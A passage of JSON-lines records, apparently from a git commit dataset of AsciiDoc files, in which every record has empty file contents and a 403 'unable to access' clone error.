notes.asciidoc","repos":"brechin\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia","old_file":"notes.asciidoc","new_file":"notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1deaf8aca82d10eb22c3538e4154ff335b5cb32a","subject":"Update 2017-09-22-Another-test-post.adoc","message":"Update 2017-09-22-Another-test-post.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-22-Another-test-post.adoc","new_file":"_posts\/2017-09-22-Another-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ac2de4c623065d4043e497a9b79a85c730373b3","subject":"add clojure-asis meetup","message":"add clojure-asis meetup\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojure-asia-jun.adoc","new_file":"content\/events\/2022\/clojure-asia-jun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"48ac2d1a99c3e02efee98d6e569b39ad1546c1b8","subject":"y2b create post The 1TB SSD RAID MacBook Pro LIVES! (Super MacBook Pro Project 2013)","message":"y2b create post The 1TB SSD RAID MacBook Pro LIVES! (Super MacBook Pro Project 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-05-The-1TB-SSD-RAID-MacBook-Pro-LIVES-Super-MacBook-Pro-Project-2013.adoc","new_file":"_posts\/2013-07-05-The-1TB-SSD-RAID-MacBook-Pro-LIVES-Super-MacBook-Pro-Project-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b706c459cc1f2fb3b57e2ebe4e5b3f2f426a2dd","subject":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","message":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02338ad1c3893776a2b263589bc1fb8acf2fbfde","subject":"Works on doc","message":"Works on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpviewtojson.adoc","new_file":"doc\/api\/xatmi\/tpviewtojson.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"34733efe4934f4bbddefe560454e65d9896de97e","subject":"Update 2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","message":"Update 2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","new_file":"_posts\/2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7d43f60087748d23adac9fa5e511e2166f600ea","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6551215d997e57cefe6d6042205f35cb3140b1f","subject":"Update 2017-08-17-Speedy-IDE.adoc","message":"Update 2017-08-17-Speedy-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a03f451831c29727c3719b1a65572684e95094b4","subject":"Metrics requires Wildfly 10","message":"Metrics requires Wildfly 10\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9bc30d4f2cd9c771101663121916c388a15c9b6","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0255ddeeafe6baa88a8862754c4cf0933c36fba3","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"921593ed5de3e0ff6329e55c8d491563476280d6","subject":"Update 2016-06-13-Remember-me.adoc","message":"Update 2016-06-13-Remember-me.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-13-Remember-me.adoc","new_file":"_posts\/2016-06-13-Remember-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f14f9f29defabac0e3c9e6c475961d6e7e6c778","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b096f07a6c93c509c1c5ebe6123b993b1a9d09c","subject":"y2b create post Black Ops 2 Custom Controller Unboxing (ProModz)","message":"y2b create post Black Ops 2 Custom Controller Unboxing (ProModz)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-03-Black-Ops-2-Custom-Controller-Unboxing-ProModz.adoc","new_file":"_posts\/2012-12-03-Black-Ops-2-Custom-Controller-Unboxing-ProModz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e42a0e864f45a955e81bc59925bcdd2279dea629","subject":"y2b create post These Pizza Hut Shoes Will Order Pizza For You\u2026","message":"y2b create post These Pizza Hut Shoes Will Order Pizza For You\u2026","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-15-These-Pizza-Hut-Shoes-Will-Order-Pizza-For-You.adoc","new_file":"_posts\/2017-03-15-These-Pizza-Hut-Shoes-Will-Order-Pizza-For-You.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bae183c532c4dcd94008c99a382645d0c16126a3","subject":"Update 2015-06-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2015-06-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2015-06-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52405223968e36cf5adad30abd79dabb587e9081","subject":"y2b create post i quit the challenge","message":"y2b create post i quit the challenge","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-01-i-quit-the-challenge.adoc","new_file":"_posts\/2016-07-01-i-quit-the-challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed1dac590f586f9e2570f47f7bde9757dd82e0d4","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"679edeb8f4170ea0001c60780e64897c13cf34e4","subject":"Update 2017-04-14-First-things-first.adoc","message":"Update 2017-04-14-First-things-first.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-04-14-First-things-first.adoc","new_file":"_posts\/2017-04-14-First-things-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fdb01f198832fe7b3de28ecdbf6645d0e3c0328","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d93a3eb366d561ae4dbc35da90643df12b35406e","subject":"OGM-1022 Update documentation around MongoDB CLI syntax","message":"OGM-1022 Update documentation around MongoDB CLI syntax\n\n Add examples for $orderby, .limit() alternative, update, remove and insert.\n","repos":"DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,mp911de\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-contrib,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,gunnarmorling\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"1fa6755c0d8d74cf47d132134089467e4be3eade","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf092db14f648876ae23a45a61725696752195a0","subject":"Added more troubleshooting","message":"Added more troubleshooting\n","repos":"redhat-helloworld-msa\/helloworld-msa","old_file":"troubleshooting.adoc","new_file":"troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-helloworld-msa\/helloworld-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"35e0f65b77939d8e890ab5c1bda249cc7a547fd7","subject":"Fixed deploy process","message":"Fixed deploy process\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9c0300e2c7977bef817f91ad620869bd2d94101","subject":"Add README","message":"Add README\n","repos":"DMBuce\/pacrepo","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DMBuce\/pacrepo.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"47058d86cbd3da0deabb82dcdfbb1016cd62bfd1","subject":"Update 2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","message":"Update 2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","new_file":"_posts\/2018-03-03-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed588f223c51de3565ecd5c1ea88ed2b480919da","subject":"Update 2015-09-15-HubPress.adoc","message":"Update 2015-09-15-HubPress.adoc","repos":"hami-jp\/hami-jp.github.io,hami-jp\/hami-jp.github.io,hami-jp\/hami-jp.github.io","old_file":"_posts\/2015-09-15-HubPress.adoc","new_file":"_posts\/2015-09-15-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hami-jp\/hami-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0a1d51229e454358d9c895b45bebad3cc9418fd","subject":"Update 2015-09-16-material.adoc","message":"Update 2015-09-16-material.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-16-material.adoc","new_file":"_posts\/2015-09-16-material.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f6be6e6a80f70ff0542fa5ab283dc5198a77474","subject":"Update 2016-08-08-New-blog.adoc","message":"Update 2016-08-08-New-blog.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-New-blog.adoc","new_file":"_posts\/2016-08-08-New-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38862a1a8ac3573480fe108bc61912862949ef9c","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/09\/09\/deref.adoc","new_file":"content\/news\/2022\/09\/09\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"a041568c4e303b383240601ae5067f8613ca3a3c","subject":"add a readme","message":"add a readme\n","repos":"devnull-tools\/boteco,devnull-tools\/boteco","old_file":"plugins\/boteco-plugin-redhat\/README.adoc","new_file":"plugins\/boteco-plugin-redhat\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devnull-tools\/boteco.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfc319abe01a9f2c499f1e6612befa840638dfd2","subject":"List format","message":"List format\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Style.adoc","new_file":"Best practices\/Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e311cd7b5422ef274e12c1a0ec067acdf49827c","subject":"typo fix","message":"typo fix\n\nHortonworks PHD to HDP","repos":"spring-projects\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,rajkumargithub\/spring-xd-samples,rajkumargithub\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,morfeo8marc\/spring-xd-samples,ghillert\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,ghillert\/spring-xd-samples,huunhancit\/spring-xd-samples,rajkumargithub\/spring-xd-samples,ghillert\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,morfeo8marc\/spring-xd-samples,morfeo8marc\/spring-xd-samples,spring-projects\/spring-xd-samples,viveksd87\/spring-xd-samples,ghillert\/spring-xd-samples,viveksd87\/spring-xd-samples,ghillert\/spring-xd-samples,viveksd87\/spring-xd-samples,morfeo8marc\/spring-xd-samples,spring-projects\/spring-xd-samples,spring-projects\/spring-xd-samples,ghillert\/spring-xd-samples,huunhancit\/spring-xd-samples,morfeo8marc\/spring-xd-samples,huunhancit\/spring-xd-samples,constantlearner\/spring-xd,viveksd87\/spring-xd-samples,viveksd87\/spring-xd-samples,rajkumargithub\/spring-xd-samples,rajkumargithub\/spring-xd-samples,constantlearner\/spring-xd,spring-projects\/spring-xd-samples,spring-projects\/spring-xd-samples,constantlearner\/spring-xd","old_file":"hadoop-config\/README.asciidoc","new_file":"hadoop-config\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/constantlearner\/spring-xd.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b08f1ffa28501af04cce88e457cb62ab63ca6d9","subject":"Publish 2016-10-12.adoc","message":"Publish 2016-10-12.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"2016-10-12.adoc","new_file":"2016-10-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe5a30a0af0ac2d512c468f8ed9f5b99a54e9979","subject":"Update 2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","message":"Update 2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","new_file":"_posts\/2015-12-26-Manejo-Eficiente-del-Tiempo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31efbc7f2e89424ac05d0209fe9a2f4bb0029f7","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bcb882ec8832deb465426079867530b6f9c909c","subject":"Update 2015-02-24-need-h1-to-save.adoc","message":"Update 2015-02-24-need-h1-to-save.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_file":"_posts\/2015-02-24-need-h1-to-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f02733f3f269acbeb29570ecdb32c0b65a84b81","subject":"Update 2017-07-07-release-ml-utils.adoc","message":"Update 2017-07-07-release-ml-utils.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_file":"_posts\/2017-07-07-release-ml-utils.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"914e6dff8bddd93f86dabdb43d6405e1e3827076","subject":"Update 2018-11-08-A-W-S-Azure.adoc","message":"Update 2018-11-08-A-W-S-Azure.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_file":"_posts\/2018-11-08-A-W-S-Azure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b68361b303ecfb696132fa2c1f56ba3630422cd3","subject":"Alerts autoresolve blog post","message":"Alerts autoresolve blog post\n","repos":"jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/08\/25\/hawkular-alerts-autoresolve.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/08\/25\/hawkular-alerts-autoresolve.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7702ef5ef2046d3914bdd4556fc3dcb24a2c754e","subject":"Fixed README","message":"Fixed README\n","repos":"rmuhamedgaliev\/MPI-lab2","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"417a53fa3dc3266b534a0a955aafc3e111dd6581","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a313eec090a880539cb44fb88267493242558b03","subject":"Update 